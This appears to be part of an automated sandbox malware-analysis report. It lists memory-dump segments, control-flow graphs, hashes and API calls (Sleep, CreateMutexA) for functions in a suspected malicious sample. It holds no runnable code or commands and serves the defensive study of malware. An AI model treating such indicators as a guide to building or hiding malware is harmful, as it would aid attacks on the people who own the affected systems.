                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458626713.0000000000A85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458645187.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458657521.0000000000A88000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458929915.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458945923.0000000000A8B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458960976.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458977774.0000000000A9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458989840.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459005401.0000000000AB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459024005.0000000000AB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459038850.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459055488.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459072461.0000000000ADE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459086887.0000000000AE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459101565.0000000000AEB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459116097.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459131565.0000000000AF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459144829.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459158858.0000000000AF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459171112.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459184882.0000000000B05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459199433.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459214292.0000000000B11000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459227978.0000000000B13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459240014.0000000000B14000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459252716.0000000000B16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459264586.0000000000B17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459278527.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459291171.0000000000B23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459305143.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459320428.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459333285.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459345440.0000000000B34000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459359173.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459379108.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459393452.0000000000B44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459405663.0000000000B45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459417847.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459417847.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459460215.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459485889.0000000000B92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459501980.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459515010.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459532625.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459545214.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_890000_file.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                                                                            • Opcode ID: 14db7bb3f277b84cf9f94adc13d8e0e2d5eb6281b5585373ca1af280db405f50
                                                                                                                                                                                            • Instruction ID: 370482a4919c1c2039f510c596cce85c0898000896accf1d815c0f184d751edd
                                                                                                                                                                                            • Opcode Fuzzy Hash: 14db7bb3f277b84cf9f94adc13d8e0e2d5eb6281b5585373ca1af280db405f50
                                                                                                                                                                                            • Instruction Fuzzy Hash: 923107716042448BEF08BB7CDDC976DBA62FBC2324F28821CE055D77D6D77999808792

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 241 899f44-899f64 245 899f92-899fae 241->245 246 899f66-899f72 241->246 249 899fdc-899ffb 245->249 250 899fb0-899fbc 245->250 247 899f88-899f8f call 8ad663 246->247 248 899f74-899f82 246->248 247->245 248->247 255 89a92b 248->255 253 89a029-89a916 call 8a80c0 249->253 254 899ffd-89a009 249->254 251 899fbe-899fcc 250->251 252 899fd2-899fd9 call 8ad663 250->252 251->252 251->255 252->249 258 89a00b-89a019 254->258 259 89a01f-89a026 call 8ad663 254->259 261 89a953-89a994 Sleep CreateMutexA 255->261 262 89a92b call 8c6c6a 255->262 258->255 258->259 259->253 270 89a9a7-89a9a8 261->270 271 89a996-89a998 261->271 262->261 271->270 273 89a99a-89a9a5 271->273 273->270
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0089A963
                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,008F3254), ref: 0089A981
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1457682859.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1457671208.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457682859.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457732745.00000000008F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457774864.00000000008FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457790768.0000000000905000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457802488.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457813801.0000000000907000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458357790.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458376642.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458392856.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458420879.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458626713.0000000000A85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458645187.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458657521.0000000000A88000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458929915.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458945923.0000000000A8B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458960976.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458977774.0000000000A9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458989840.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459005401.0000000000AB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459024005.0000000000AB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459038850.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459055488.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459072461.0000000000ADE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459086887.0000000000AE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459101565.0000000000AEB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459116097.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459131565.0000000000AF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459144829.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459158858.0000000000AF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459171112.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459184882.0000000000B05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459199433.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459214292.0000000000B11000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459227978.0000000000B13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459240014.0000000000B14000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459252716.0000000000B16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459264586.0000000000B17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459278527.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459291171.0000000000B23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459305143.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459320428.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459333285.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459345440.0000000000B34000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459359173.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459379108.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459393452.0000000000B44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459405663.0000000000B45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459417847.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459417847.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459460215.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459485889.0000000000B92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459501980.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459515010.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459532625.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459545214.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_890000_file.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                                                                            • Opcode ID: 576547ecf93bc2679cec2615920c480d695ca4871e5d6d4b4f32facad551d7db
                                                                                                                                                                                            • Instruction ID: 3f2d3066b09d8ae2efebce9c06ec231b494a3053b93883cfa74b6c8cad945165
                                                                                                                                                                                            • Opcode Fuzzy Hash: 576547ecf93bc2679cec2615920c480d695ca4871e5d6d4b4f32facad551d7db
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B3128316002448BFF0CAB7CDC89B6DFB62FB86320F28461CE455D76D5DB3599808792

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 275 89a079-89a099 279 89a09b-89a0a7 275->279 280 89a0c7-89a0e3 275->280 281 89a0a9-89a0b7 279->281 282 89a0bd-89a0c4 call 8ad663 279->282 283 89a111-89a130 280->283 284 89a0e5-89a0f1 280->284 281->282 287 89a930 281->287 282->280 285 89a15e-89a916 call 8a80c0 283->285 286 89a132-89a13e 283->286 289 89a0f3-89a101 284->289 290 89a107-89a10e call 8ad663 284->290 291 89a140-89a14e 286->291 292 89a154-89a15b call 8ad663 286->292 295 89a953-89a994 Sleep CreateMutexA 287->295 296 89a930 call 8c6c6a 287->296 289->287 289->290 290->283 291->287 291->292 292->285 304 89a9a7-89a9a8 295->304 305 89a996-89a998 295->305 296->295 305->304 307 89a99a-89a9a5 305->307 307->304
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0089A963
                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,008F3254), ref: 0089A981
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1457682859.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1457671208.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457682859.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457732745.00000000008F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457774864.00000000008FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457790768.0000000000905000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457802488.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457813801.0000000000907000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458357790.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458376642.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458392856.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458420879.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458626713.0000000000A85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458645187.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458657521.0000000000A88000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458929915.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458945923.0000000000A8B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458960976.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458977774.0000000000A9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458989840.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459005401.0000000000AB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459024005.0000000000AB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459038850.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459055488.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459072461.0000000000ADE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459086887.0000000000AE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459101565.0000000000AEB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459116097.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459131565.0000000000AF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459144829.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459158858.0000000000AF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459171112.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459184882.0000000000B05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459199433.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459214292.0000000000B11000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459227978.0000000000B13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459240014.0000000000B14000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459252716.0000000000B16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459264586.0000000000B17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459278527.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459291171.0000000000B23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459305143.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459320428.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459333285.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459345440.0000000000B34000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459359173.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459379108.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459393452.0000000000B44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459405663.0000000000B45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459417847.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459417847.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459460215.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459485889.0000000000B92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459501980.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459515010.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459532625.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459545214.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_890000_file.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                                                                            • Opcode ID: 4632302e7feec1b2cbb197313af5c57890d2b2ef117726d9d4904348292dbe58
                                                                                                                                                                                            • Instruction ID: d881e6aca20f3be77082e7bf5841a8e0a7e08f82fc7dc0daada5a11ec855fa2b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4632302e7feec1b2cbb197313af5c57890d2b2ef117726d9d4904348292dbe58
                                                                                                                                                                                            • Instruction Fuzzy Hash: 383105716002449BEF0CAB7CDD89B6DBB62FB82324F288618E025D77D5D77699808692

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 309 89a1ae-89a1ce 313 89a1fc-89a218 309->313 314 89a1d0-89a1dc 309->314 315 89a21a-89a226 313->315 316 89a246-89a265 313->316 317 89a1de-89a1ec 314->317 318 89a1f2-89a1f9 call 8ad663 314->318 319 89a228-89a236 315->319 320 89a23c-89a243 call 8ad663 315->320 321 89a293-89a916 call 8a80c0 316->321 322 89a267-89a273 316->322 317->318 323 89a935 317->323 318->313 319->320 319->323 320->316 329 89a289-89a290 call 8ad663 322->329 330 89a275-89a283 322->330 326 89a953-89a994 Sleep CreateMutexA 323->326 327 89a935 call 8c6c6a 323->327 338 89a9a7-89a9a8 326->338 339 89a996-89a998 326->339 327->326 329->321 330->323 330->329 339->338 341 89a99a-89a9a5 339->341 341->338
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0089A963
                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,008F3254), ref: 0089A981
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1457682859.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1457671208.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457682859.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457732745.00000000008F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457774864.00000000008FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457790768.0000000000905000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457802488.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457813801.0000000000907000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458357790.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458376642.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458392856.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458420879.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458626713.0000000000A85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458645187.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458657521.0000000000A88000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458929915.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458945923.0000000000A8B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458960976.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
